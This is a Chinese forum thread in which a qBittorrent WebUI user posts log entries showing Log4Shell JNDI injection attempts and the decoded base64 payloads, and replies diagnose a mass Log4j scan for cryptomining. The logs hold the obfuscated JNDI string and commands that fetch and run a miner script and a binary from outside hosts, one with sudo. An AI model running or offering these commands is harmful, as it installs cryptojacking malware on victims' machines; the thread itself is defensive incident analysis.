在当前最新的 Windows qbittorrent 4.5.2 版本和 4.4.5 版本都遇到了来着这个 IP 的入侵。
对这些不太懂,唯一能做的是给日志里这段 base64 解了个码;日志末尾的 IP port 指代我的公网 IP 和 webUI 接口。
我的电脑是已成了矿机了吗,求分析,谢谢。
第一段 base64:curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 486xqw7y
2023-04-26 14:36 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')'。XFH/Host: 'IP:Port'
第二段 base64:wget http://107.172.206.114/.duck/lscpu ; curl -O http://107.172.206.114/.duck/lscpu ; chmod +x lscpu ; chmod 777 lscpu ; ./lscpu runner ; sudo ./lscpu runner ; rm -rf lscpu
2023-05-06 20:13 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')'。XFH/Host: 'IP:Port'
1
leoleoleo 2023-05-09 16:22:20 +08:00 1
看日志,是尝试利用 Log4j 漏洞来给设备中上挖矿木马。是否利用成功,你需要看一下设备的资源占用,cpu 和内存是否有异常的标高,以及系统是否出现了异常的定时任务或者服务。
|
2
0TSH60F7J2rVkg8t 2023-05-09 16:27:00 +08:00 1
理论上这是个利用 linux 漏洞攻击的代码,如果楼主是 windows 的话,应该不会中找。
|
3
Lentin 2023-05-09 16:28:47 +08:00 1
|
4
javashell 2023-05-09 16:49:40 +08:00 1
从日志上看是 log4j 库进行 jndi 注入攻击。
如果楼主的 qbittorrent webUI 使用的默认密码或使用的是弱密码,可以进行命令执行的(有次 ssh 配置改崩了,就是通过 qbittorrent 改回来的) |
5
20160409 OP |
6
javashell 2023-05-09 17:07:28 +08:00 1
@20160409 qbittorrent 有个功能可以实现下载完成后执行指定的命令 ,叫 "Run external program on torrent completion" 可被用来进行挖矿、勒索等 ,最好是关闭 webui 访问
|
7
20160409 OP 形势应该还不严峻
> QBittorrent is C++, safe https://www.reddit.com/r/homelab/comments/recvfp/comment/ho78vfd/ ------------------- 拿火绒的 Log4j2 漏洞缓解工具扫描,返回结果: > [Error] Get JAVA_HOME path failed .. JAVA_HOME 都没配置好,应该利用不起来这个漏洞? [3> 如果出现如下日志,则需要排查 JAVA_HOME 环境变量是否正确配置 ----- CVE-2021-44228 漏洞缓解结果 ----- [Error] Get JAVA_HOME path failed .. 或者 ----- CVE-2021-44228 漏洞缓解结果 ----- [Error] Get Java version failed ..] https://bbs.huorong.cn/thread-96320-1-1.html |
8
7h3d4wn 2023-05-09 18:56:42 +08:00 1
|
9
tpxcer 2023-05-09 19:04:12 +08:00 via iPhone
怎么发现被入侵的?我现 24 小时开着,外网也直接能访问到,有点慌
|
11
winsunz 2023-05-09 19:30:28 +08:00
吓得我赶紧关掉端口了
|
12
webshe11 2023-05-09 19:35:05 +08:00 1
批量扫 Log4j CVE-2021-44228 漏洞的,qBT 的 Web 服务不是用 Java 写的,不受这个漏洞影响
但是做好访问控制,减少攻击面总没错 |